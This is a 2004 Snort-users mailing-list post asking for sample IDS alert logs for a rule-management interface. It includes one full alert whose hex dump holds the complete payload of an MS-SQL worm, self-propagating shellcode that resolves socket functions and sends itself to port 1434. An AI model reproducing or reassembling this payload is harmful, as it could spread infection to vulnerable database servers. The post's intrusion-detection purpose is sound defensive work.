[Snort-users] Search examples of alert_full

Guillaume Rix Guillaume.Rix at ...5663...
Tue Oct 12 03:02:55 EDT 2004


Hi,

I search an exemple of each snort signature in the following log format (header + payload) :

[**] MS-SQL Worm propagation attempt [**]
10/09/04-00:30:43.255016 72:A9:20:0:1:0 -> 1:0:1:0:0:0type:0x800 len:0x1A2
200.121.5.101:1806 -> 62.34.163.248:1434 UDP TTL:118 TOS:0x0 ID:46681 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsjkso
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  ckoQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E... at ...966...
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

I am making a web interface for delete, create, modify, test, compare and other actions on snort rules.

If you could help me with extracts of this format logs, it will be very appreciated.

Guillaume





More information about the Snort-users mailing list